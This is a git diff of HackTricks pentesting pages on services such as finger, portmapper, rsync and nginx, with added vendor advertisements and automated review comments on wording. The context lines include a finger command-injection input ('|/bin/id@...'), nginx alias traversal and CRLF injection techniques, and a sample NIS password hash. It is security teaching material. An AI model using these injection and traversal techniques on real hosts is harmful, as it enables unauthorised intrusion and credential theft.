**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Docker Basics ## Docker Basics
### What is ### What is
@ -349,6 +356,13 @@ falco-probe found and loaded in dkms
You can use auditd to monitor docker. You can use auditd to monitor docker.
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information ## Basic Information
Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isnt dependent on it. Theyre both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\ Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isnt dependent on it. Theyre both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\
@ -106,6 +113,13 @@ For more information check:
* [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y) * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y)
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information ## Basic Information
> The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording). > The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording).
@ -98,8 +105,14 @@ Cameradar allows you to:
* Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content * Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content
* Try to create a Gstreamer pipeline to check if they are properly encoded * Try to create a Gstreamer pipeline to check if they are properly encoded
* Print a summary of all the informations Cameradar could get * Print a summary of all the informations Cameradar could get
* [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
[https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) {% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
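Review bot: `informations` in the context line `* Print a summary of all the informations Cameradar could get` should be `information`; since this hunk already reshapes the list (the cameradar URL becomes a bullet item), fix it in the same change.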

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## **Basic Information** ## **Basic Information**
> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. > **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). 
The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
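Review bot: splitting the quoted rsync description into two paragraphs loses the quote marker on the second one: the new line starting `The rsync algorithm is a type of [delta encoding]` has no `> ` prefix, so it renders as the page's own text rather than as the rest of the Wikipedia quotation it continues. Prefix it with `> ` (and separate the two quoted paragraphs with a bare `>` line), and drop the trailing whitespace left after `[operating systems](...)` at the end of the first quoted line.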
@ -111,6 +118,13 @@ find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd. Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd.
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
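Review bot: `this file could contains usernames and passwords` in the context line should be `could contain`; worth fixing alongside the edit to this block.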

@ -1,4 +1,4 @@
# 79 - Pentesting Finger
<details> <details>
@ -16,28 +16,34 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# **Basic Info** {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number \(if known\), login time, idle time, time mail was last read, and the user's plan and project files. ## **Basic Info**
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.
**Default port:** 79 **Default port:** 79
```text ```
PORT STATE SERVICE PORT STATE SERVICE
79/tcp open finger 79/tcp open finger
``` ```
# **Enumeration** ## **Enumeration**
## **Banner Grabbing/Basic connection** ### **Banner Grabbing/Basic connection**
```bash ```bash
nc -vn <IP> 79 nc -vn <IP> 79
echo "root" | nc -vn <IP> 79 echo "root" | nc -vn <IP> 79
``` ```
## **User enumeration** ### **User enumeration**
```bash ```bash
finger @<Victim> #List users finger @<Victim> #List users
@ -53,35 +59,40 @@ finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt finger-user-enum.pl -U users.txt -T ips.txt
``` ```
### **Nmap execute a script for doing using default scripts** #### **Nmap execute a script for doing using default scripts**
## Metasploit uses more tricks than Nmap ### Metasploit uses more tricks than Nmap
```text ```
use auxiliary/scanner/finger/finger_users use auxiliary/scanner/finger/finger_users
``` ```
## Shodan ### Shodan
* `port:79 USER` * `port:79 USER`
# Command execution ## Command execution
```bash ```bash
finger "|/bin/id@example.com" finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com" finger "|/bin/ls -a /@example.com"
``` ```
# Finger Bounce ## Finger Bounce
[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/) [Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```text ```
finger user@host@victim finger user@host@victim
finger @internal@external finger @internal@external
``` ```
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
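Review bot: `#### **Nmap execute a script for doing using default scripts**` is demoted one level but its wording is still garbled ("for doing using"); reword it while touching the line, for example `### Nmap: user enumeration with the default scripts`, and make it `###` like its siblings `### Metasploit uses more tricks than Nmap` and `### Shodan`, since all three are enumeration methods under `## **Enumeration**` and should sit at the same level.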
@ -98,5 +109,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

@ -1,4 +1,4 @@
# 111/TCP/UDP - Pentesting Portmapper
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Basic Information {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information
Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service. Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.
@ -28,7 +34,7 @@ PORT STATE SERVICE
111/tcp open rpcbind 111/tcp open rpcbind
``` ```
# Enumeration ## Enumeration
``` ```
rpcinfo irked.htb rpcinfo irked.htb
@ -39,11 +45,11 @@ Sometimes it doesn't give you any information, in other occasions you will get s
![](<../.gitbook/assets/image (230).png>) ![](<../.gitbook/assets/image (230).png>)
## Shodan ### Shodan
* `port:111 portmap` * `port:111 portmap`
# RPCBind + NFS ## RPCBind + NFS
If you find the service NFS then probably you will be able to list and download(and maybe upload) files: If you find the service NFS then probably you will be able to list and download(and maybe upload) files:
@ -51,7 +57,7 @@ If you find the service NFS then probably you will be able to list and download(
Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol. Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol.
# NIS ## NIS
If you find the service `ypbind`running: If you find the service `ypbind`running:
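Review bot: the context line "If you find the service `ypbind`running:" is missing the space between `ypbind` and `running`; add it while the heading above is being changed.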
@ -81,7 +87,7 @@ yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash
| /etc/group | group.byname, group.bygid | NIS group file | | /etc/group | group.byname, group.bygid | NIS group file |
| /usr/lib/aliases | mail.aliases | Details mail aliases | | /usr/lib/aliases | mail.aliases | Details mail aliases |
# RPC Users ## RPC Users
If you find the **rusersd** service listed like this: If you find the **rusersd** service listed like this:
@ -89,17 +95,17 @@ If you find the **rusersd** service listed like this:
You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md). You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
# Bypass Filtered Portmapper port ## Bypass Filtered Portmapper port
If during a nmap scan you see open ports like NFS but the port 111 is filtered, you won't be able to exploit those ports.\ If during a nmap scan you see open ports like NFS but the port 111 is filtered, you won't be able to exploit those ports.\
But, if you can simulate a locally a portmapper service and you tunnel the NFS port from your machine to the victim one, you will be able to use regular tools to exploit those services.\ But, if you can simulate a locally a portmapper service and you tunnel the NFS port from your machine to the victim one, you will be able to use regular tools to exploit those services.\
More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc) More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)
# Shodan ## Shodan
* `Portmap` * `Portmap`
# HackTricks Automatic Commands ## HackTricks Automatic Commands
``` ```
Protocol_Name: Portmapper #Protocol Abbreviation if there is one. Protocol_Name: Portmapper #Protocol Abbreviation if there is one.
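Review bot: after this change the page carries two Shodan sections at different levels: `### Shodan` with `port:111 portmap` under Enumeration earlier in the file, and `## Shodan` with `Portmap` here; merge them into the single `### Shodan` under Enumeration, since Shodan is not a top-level topic of the page. Also, the context line `simulate a locally a portmapper service` should read `simulate a portmapper service locally`.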
@ -125,6 +131,12 @@ Entry_3:
Command: nmap -sSUC -p 111 {IP} Command: nmap -sSUC -p 111 {IP}
``` ```
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -141,5 +153,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information ## Basic Information
In computing, **Virtual Network Computing** (**VNC**) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network.\ In computing, **Virtual Network Computing** (**VNC**) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network.\
@ -64,6 +71,13 @@ I save the tool here also for ease of access:
* `port:5900 RFB` * `port:5900 RFB`
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

@ -1,4 +1,4 @@
# Nginx
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Missing root location <a href="#missing-root-location" id="missing-root-location"></a> {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Missing root location <a href="#missing-root-location" id="missing-root-location"></a>
``` ```
server { server {
@ -30,11 +36,11 @@ server {
} }
``` ```
The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. &#x20; The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`.
A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication. A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication.
# Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a> ## Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
Inside the Nginx configuration look the "location" statements, if someone looks like: Inside the Nginx configuration look the "location" statements, if someone looks like:
@ -78,7 +84,7 @@ alias../../../../../../../../../../../ => HTTP status code 400
alias../ => HTTP status code 403 alias../ => HTTP status code 403
``` ```
# Unsafe variable use <a href="#unsafe-variable-use" id="unsafe-variable-use"></a> ## Unsafe variable use <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
An example of a vulnerable Nginx configuration is: An example of a vulnerable Nginx configuration is:
@ -100,13 +106,13 @@ Location: https://example.com/
Detectify: clrf Detectify: clrf
``` ```
Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/). Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/).
## Any variable ### Any variable
In some cases, user-supplied data can be treated as an Nginx variable. Its unclear why this may be happening, but its not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI. In some cases, user-supplied data can be treated as an Nginx variable. Its unclear why this may be happening, but its not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI.
One way to test for this is to set a referer header value:&#x20; One way to test for this is to set a referer header value:
``` ```
$ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar $ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar
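Review bot: the test command in this block, `curl -H Referer: bar http://localhost/foo$http_referer | grep foobar`, has a shell-quoting bug that the `&#x20;` cleanup does not address: unquoted, `-H Referer:` passes a header with no value and `bar` is parsed as a second URL, and the shell expands `$http_referer` (unset) to an empty string before nginx ever sees it, so the `grep foobar` check can never match. Write it as `curl -H "Referer: bar" 'http://localhost/foo$http_referer' | grep foobar` so the header carries `bar` and the literal `$http_referer` reaches the server.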
@ -114,9 +120,9 @@ $ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar
We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched. We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched.
# Raw backend response reading ## Raw backend response reading
With Nginxs `proxy_pass`, theres the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that its an HTTP response?&#x20; With Nginxs `proxy_pass`, theres the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that its an HTTP response?
If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx wont understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this: If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx wont understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this:
@ -127,7 +133,7 @@ def application(environ, start_response):
return [b"Secret info, should not be visible!"] return [b"Secret info, should not be visible!"]
``` ```
And with the following directives in Nginx:&#x20; And with the following directives in Nginx:
``` ```
http { http {
@ -139,7 +145,7 @@ http {
[proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx. [proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx.
[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client.&#x20; [proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client.
If we send a normal `GET` request, Nginx will return: If we send a normal `GET` request, Nginx will return:
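Review bot: the context line says `proxy_intercept_errors` `will serve a custom response if the backend has a response status greater than 300`; per the nginx documentation the directive intercepts responses with codes greater than or equal to 300 (a 300 itself is intercepted), so change it to `300 or higher`.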
@ -169,13 +175,13 @@ Secret-Header: secret-info
Secret info, should not be visible! Secret info, should not be visible!
``` ```
# merge\_slashes set to off ## merge\_slashes set to off
The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application thats being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d). The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application thats being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
We found 33 Nginx configuration files with `merge_slashes` set to “off”. &#x20; We found 33 Nginx configuration files with `merge_slashes` set to “off”.
# default is not specified for map directive ## default is not specified for map directive
It looks like common case when **`map` is used for some kind of authorization control**. Simplified example could look like: It looks like common case when **`map` is used for some kind of authorization control**. Simplified example could look like:
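Review bot: two wording problems in the context lines next to the heading changes here: `could leave room for exploit it` should be `could leave room to exploit it`, and `It looks like common case when` needs an article and reads better as `It looks like a common case where`.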
@ -208,11 +214,9 @@ server {
> sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default\ > sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default\
> resulting value will be an empty string. > resulting value will be an empty string.
It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`.&#x20; It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`.
# DNS Spoofing Nginx
## DNS Spoofing Nginx
According to this post: [http://blog.zorinaq.com/nginx-resol**ver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) **It might be possible to spoof DNS records** to Nginx if you **know the DNS server Nginx** is using (and you can intercept somehow the communication, so this is **not valid if 127.0.0.1** is used) and the **domain it's asking**. According to this post: [http://blog.zorinaq.com/nginx-resol**ver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) **It might be possible to spoof DNS records** to Nginx if you **know the DNS server Nginx** is using (and you can intercept somehow the communication, so this is **not valid if 127.0.0.1** is used) and the **domain it's asking**.
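Review bot: the DNS Spoofing heading is demoted here, but the link text on the line directly below it is still broken: `[http://blog.zorinaq.com/nginx-resol**ver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)` has bold markers spliced into the visible URL, which renders as a mangled label. Make the label the plain URL `http://blog.zorinaq.com/nginx-resolver-vulns/` (the link target is already correct) while this hunk is open.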
@ -222,31 +226,37 @@ Nginx can specify a DNS server to use with:
resolver 8.8.8.8; resolver 8.8.8.8;
``` ```
# `proxy_pass` and `internal` directives ## `proxy_pass` and `internal` directives
The **`proxy_pass`** directive can be used to **redirect internally requests to other servers** internal or external.\ The **`proxy_pass`** directive can be used to **redirect internally requests to other servers** internal or external.\
The **`internal`** directive is used to make it clear to Nginx that the **location can only be accessed internally**. The **`internal`** directive is used to make it clear to Nginx that the **location can only be accessed internally**.
The use of these directives **isn't a vulnerability but you should check how are them configured**. The use of these directives **isn't a vulnerability but you should check how are them configured**.
# Try it yourself ## Try it yourself
Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself! Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself!
[https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx) [https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx)
# Static Analyzer tools ## Static Analyzer tools
## [GIXY](https://github.com/yandex/gixy) ### [GIXY](https://github.com/yandex/gixy)
